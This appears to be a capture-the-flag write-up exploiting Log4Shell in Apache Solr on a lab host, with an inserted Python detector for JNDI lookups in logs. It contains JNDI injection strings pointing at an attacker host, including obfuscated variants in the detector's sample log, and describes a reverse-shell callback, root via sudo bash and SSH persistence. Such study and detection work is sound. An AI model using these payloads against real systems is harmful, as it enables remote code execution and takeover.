The CVE-2021-44228 vulnerability (Log4Shell) poses a major threat to internet-facing Java applications and carries a CVSS score of 10.0 (critical). Remote code execution is achieved by abusing the Java Naming and Directory Interface (JNDI) lookup feature built into the Log4j 2 logging library: when an attacker-controlled string such as ${jndi:ldap://attacker/a} reaches a log statement, Log4j resolves the lookup, connects to the attacker's server and loads whatever object it returns. Solar provides a test scenario for exploiting this vulnerability.
Legal Notice && Usage: The information provided by executeatwill is to be used for educational purposes only. The website creator and/or editor is in no way responsible for any misuse of the information provided. All the information on this website is meant to help the reader develop penetration testing and vulnerability aptitude to prevent the attacks discussed. In no way should you use the information to cause any kind of damage, directly or indirectly. Information provided by this website is to be regarded from an "ethical hacker" standpoint. Only perform testing on systems you OWN and/or have express written permission to test. Use the information at your own risk. By continuing, you acknowledge the aforementioned user risks/responsibilities.
Reconnaissance
Enumeration
Nmap scan:
Further enumerate port 8983:
Discovery
HTTP Server
Navigate to http://10.10.212.184:8983, which serves the Apache Solr web interface.
The JVM argument -Dsolr.log.dir is set to /var/solr/logs, so that is where Solr writes its log files.
Downloaded Task Files
Within the solr.log file we can see an example of the log entries Solr normally generates. Because request parameters are written into these entries by Log4j, anything an attacker places in a parameter is evaluated by the same lookup mechanism.
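The log sample above is also what a defender would review after the fact. The following is an added example, not code from the original writeup: it scans Log4j-style log lines for JNDI lookup injection attempts, normalising the common obfuscations (${lower:...}, ${upper:...}, ${...:-default} nesting and URL encoding) before matching, so that a payload like ${${lower:j}ndi:...} is caught as well as the literal form. The sample log lines and the attacker address 10.8.0.1 are constructed for the example; the path /admin/cores and parameter name foo are those used in this writeup.

```python
"""Detect Log4Shell (CVE-2021-44228) JNDI lookups in Log4j-style log lines.

Added example, not part of the original writeup. SAMPLE_LOG is constructed;
it imitates Solr request logging but is not copied from a real log.
"""
import re
import urllib.parse
from typing import List, Tuple

# Log4j lookups that attackers nest inside ${jndi:...} to evade literal matching.
_LOWER_UPPER = re.compile(r"\$\{\s*(lower|upper)\s*:\s*([^${}]*)\}", re.IGNORECASE)
# ${prefix:key:-default} resolves to "default" when the key is unset, e.g. ${::-j}
_DEFAULT_VAL = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")
# The thing we actually care about once the string has been flattened.
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalize(line: str, max_rounds: int = 10) -> str:
    """Undo URL encoding, then resolve nested lookups until the text stops changing.

    max_rounds bounds the work so a pathological line cannot spin the scanner.
    """
    line = urllib.parse.unquote(line)
    for _ in range(max_rounds):
        new = _LOWER_UPPER.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(),
            line,
        )
        new = _DEFAULT_VAL.sub(lambda m: m.group(1), new)
        if new == line:
            break
        line = new
    return line


def is_jndi_attempt(line: str) -> bool:
    """True if the line, after normalisation, carries a ${jndi:...} lookup."""
    return bool(_JNDI.search(normalize(line)))


def scan(log_text: str) -> List[Tuple[int, str]]:
    """Return (line_number, normalised_payload) for every line with a JNDI lookup."""
    hits = []
    for n, raw in enumerate(log_text.splitlines(), start=1):
        norm = normalize(raw)
        m = _JNDI.search(norm)
        if m:
            end = norm.find("}", m.start())
            hits.append((n, norm[m.start(): end + 1 if end != -1 else None]))
    return hits


# Constructed sample: one benign request, four injection attempts in different
# encodings, and one non-JNDI lookup that this detector deliberately ignores.
SAMPLE_LOG = """\
2021-12-13 18:02:11.230 INFO  (qtp1234-17) [   ] o.a.s.s.HttpSolrCall [admin] webapp=null path=/admin/cores params={} status=0 QTime=3
2021-12-13 18:05:42.118 INFO  (qtp1234-19) [   ] o.a.s.s.HttpSolrCall [admin] webapp=null path=/admin/cores params={foo=${jndi:ldap://10.8.0.1:9999/a}} status=0 QTime=1
2021-12-13 18:06:01.004 INFO  (qtp1234-21) [   ] o.a.s.s.HttpSolrCall [admin] webapp=null path=/admin/cores params={foo=${${lower:j}ndi:${lower:l}${lower:d}ap://10.8.0.1:9999/a}} status=0 QTime=1
2021-12-13 18:06:30.777 INFO  (qtp1234-22) [   ] o.a.s.s.HttpSolrCall [admin] webapp=null path=/admin/cores params={foo=${${::-j}${::-n}${::-d}${::-i}:rmi://10.8.0.1:1099/a}} status=0 QTime=2
2021-12-13 18:07:15.301 INFO  (qtp1234-23) [   ] o.a.s.s.HttpSolrCall [admin] webapp=null path=/admin/cores params={foo=%24%7Bjndi%3Aldap%3A%2F%2F10.8.0.1%3A9999%2Fa%7D} status=0 QTime=1
2021-12-13 18:08:00.000 INFO  (qtp1234-24) [   ] o.a.s.s.HttpSolrCall [admin] webapp=null path=/admin/cores params={foo=${java:version}} status=0 QTime=1
"""


if __name__ == "__main__":
    for line_no, payload in scan(SAMPLE_LOG):
        print("line %d: %s" % (line_no, payload))
```

The detector only answers "is this a JNDI lookup"; any ${...} arriving in an untrusted parameter deserves a look, and the last sample line shows a non-JNDI lookup that this particular check lets through by design.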
Proof of Concept
Navigate to http://10.10.212.184:8983/solr/admin/cores. Requests to this endpoint are logged together with their query parameters, so a parameter value supplied by the attacker is handed straight to Log4j.
Log4j payload:
Creating a test scenario
Making the target call back to the local attacking machine lets a local listener capture the incoming request, which confirms that the JNDI lookup fires and that the target can reach us before any exploit class is served.
A listener is set up locally on port 9999 and the payload is sent via curl:
A successful connection from the target system to the attacking system is established by injecting the crafted payload into the foo query parameter; the listener sees the target's LDAP connection attempt even though nothing has been served yet.
Set up a local LDAP server:
Craft a Java reverse shell on the attacking machine to create the exploit:
Compile the Java exploit code:
The newly created Exploit.class file is hosted locally and referenced by the JNDI payload, so the target fetches and loads it when it resolves the lookup.
Send the payload:
Persistence
Establishing a foothold on the box as the solr user.
Check sudo rights with sudo -l: /bin/bash can be called with sudo, which gives a root shell.
Change the password of the solr user to be able to SSH into the target.